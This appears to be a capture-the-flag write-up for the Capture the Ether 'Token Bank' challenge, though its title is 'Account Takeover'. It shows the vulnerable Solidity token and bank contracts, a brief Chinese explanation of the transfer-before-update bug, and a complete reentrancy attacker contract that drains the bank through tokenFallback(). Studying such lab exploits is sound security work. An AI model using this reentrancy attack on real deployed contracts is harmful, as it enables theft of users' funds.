17.Account Takeover
2023-06-23 20:22:15 # 01.Capturetheether CTF

Account Takeover

topic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
pragma solidity ^0.4.21;

interface ITokenReceiver {
function tokenFallback(address from, uint256 value, bytes data) external;
}

contract SimpleERC223Token {
// Track how many tokens are owned by each address.
mapping (address => uint256) public balanceOf;

string public name = "Simple ERC223 Token";
string public symbol = "SET";
uint8 public decimals = 18;

uint256 public totalSupply = 1000000 * (uint256(10) ** decimals);

event Transfer(address indexed from, address indexed to, uint256 value);

function SimpleERC223Token() public {
balanceOf[msg.sender] = totalSupply;
emit Transfer(address(0), msg.sender, totalSupply);
}

function isContract(address _addr) private view returns (bool is_contract) {
uint length;
assembly {
//retrieve the size of the code on target address, this needs assembly
length := extcodesize(_addr)
}
return length > 0;
}

function transfer(address to, uint256 value) public returns (bool success) {
bytes memory empty;
return transfer(to, value, empty);
}

function transfer(address to, uint256 value, bytes data) public returns (bool) {
require(balanceOf[msg.sender] >= value);

balanceOf[msg.sender] -= value;
balanceOf[to] += value;
emit Transfer(msg.sender, to, value);

if (isContract(to)) {
ITokenReceiver(to).tokenFallback(msg.sender, value, data);
}
return true;
}

event Approval(address indexed owner, address indexed spender, uint256 value);

mapping(address => mapping(address => uint256)) public allowance;

function approve(address spender, uint256 value)
public
returns (bool success)
{
allowance[msg.sender][spender] = value;
emit Approval(msg.sender, spender, value);
return true;
}

function transferFrom(address from, address to, uint256 value)
public
returns (bool success)
{
require(value <= balanceOf[from]);
require(value <= allowance[from][msg.sender]);

balanceOf[from] -= value;
balanceOf[to] += value;
allowance[from][msg.sender] -= value;
emit Transfer(from, to, value);
return true;
}
}

contract TokenBankChallenge {
SimpleERC223Token public token;
mapping(address => uint256) public balanceOf;

function TokenBankChallenge(address player) public {
token = new SimpleERC223Token();

// Divide up the 1,000,000 tokens, which are all initially assigned to
// the token contract's creator (this contract).
balanceOf[msg.sender] = 500000 * 10**18; // half for me
balanceOf[player] = 500000 * 10**18; // half for you
}

function isComplete() public view returns (bool) {
return token.balanceOf(this) == 0;
}

function tokenFallback(address from, uint256 value, bytes) public {
require(msg.sender == address(token));
require(balanceOf[from] + value >= balanceOf[from]);

balanceOf[from] += value;
}

function withdraw(uint256 amount) public {
require(balanceOf[msg.sender] >= amount);

require(token.transfer(msg.sender, amount));
balanceOf[msg.sender] -= amount;
}
}

analyses

本题是有关ERC20的重入问题,可以看到如下有问题的代码:

先转钱,再修改变量

1
2
3
4
5
6
function withdraw(uint256 amount) public {
require(balanceOf[msg.sender] >= amount);

require(token.transfer(msg.sender, amount));
balanceOf[msg.sender] -= amount;
}

一旦转钱,此ERC20的transfer()就会去执行外部合约实现的tokenFallback()方法,也就是模拟fallback()函数

1
2
3
4
5
6
7
8
9
10
11
12
function transfer(address to, uint256 value, bytes data) public returns (bool) {
require(balanceOf[msg.sender] >= value);

balanceOf[msg.sender] -= value;
balanceOf[to] += value;
emit Transfer(msg.sender, to, value);

if (isContract(to)) {
ITokenReceiver(to).tokenFallback(msg.sender, value, data);
}
return true;
}

情况很明了,就是写一个重入攻击的合约,实现恶意的tokenFallback()方法,不断重入地调用取钱函数

solution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
pragma solidity ^0.4.21;

contract TokenBankSolver {
ITokenBankChallenge public challenge;
ISimpleERC223Token public token;
uint256 public balance = 500000000000000000000000;

function TokenBankSolver(address _addr,address _ISimpleERC223Token) public {
challenge = ITokenBankChallenge(_addr);
token = ISimpleERC223Token(_ISimpleERC223Token);
}

function attack() public returns(uint256) {
token.transfer(challenge, balance);
challenge.withdraw(balance);
}

function tokenFallback(address from, uint256 value, bytes data) public {
token.balanceOf(from);
require(msg.sender == address(token));
uint256 challengeLeftBalance = token.balanceOf(address(challenge));
bool keepRecursing = challengeLeftBalance > 0;
if (keepRecursing) {
uint256 v = value < challengeLeftBalance? value: challengeLeftBalance;
challenge.withdraw(v);
}
}

function isComplete() public view returns(bool) {
return challenge.isComplete();
}
}